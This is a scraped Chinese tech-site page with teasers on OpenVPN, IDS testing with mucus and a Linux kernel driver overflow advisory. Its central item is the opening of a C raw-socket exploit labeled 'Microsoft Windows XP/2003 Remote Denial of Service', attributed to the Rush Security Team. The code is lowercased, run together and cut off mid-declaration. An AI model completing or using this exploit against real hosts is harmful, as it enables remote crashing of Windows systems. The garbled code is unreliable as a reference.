当前位置:首页 » 软件开发
开发技术指南» 文章正文
    引言: #define _BSD_SOURCE#include <
 

 

    摘要:[原创]用openvpn构建安全vpn [openvpn + ca] 关于openvpn的相关内容可以在http://openvpn.net上找到。 本文原稿在chinaunix上可以找到,http://bbs.chinaunix.net/forum/viewtopic.php?t=503434 本文在那基础上对网友一些看不明白的地方加以修改,并且去掉配置文件的注释以便复制粘贴,文章的侧重点没有关......
 ·使用mucus测试ids的部署情况    »显示摘要«
    摘要:mucus is a useful tool for testing signature-based intrusion detection systems. mucus is a prototype traffic generation tool, designed to test network idss against traffic corresponding to snort rules......


Microsoft Windows XP/2003 Remote Denial of Service
#define _bsd_source#include <stdio.h> #include <ctype.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <sysexits.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> /* windows server 2003 and xp sp2 remote dos exploit tested under openbsd 3.6 at winxp sp 2 vuln by dejan levaja <dejan_@_levaja.com>(c)oded by __blf 2005 rush security team , http://rst.void.ru gr33tz: zzz, phoenix, mishast, inck-vizitor fuck lamerz: saint_i, nmalykh, mr. clumsy all rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tc
...   下一页
    摘要:发布日期:2005-02-22更新日期:2005-02-25受影响系统: linux kernel 2.6.xlinux kernel 2.4.xlinux kernel 2.2.x描述: cve(can) id: can-2005-0504linux kernel是开放源代码操作系统linux的内核。linux kernel moxa驱动moxadriverioctl函数存在缓冲区溢出,本地攻击......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE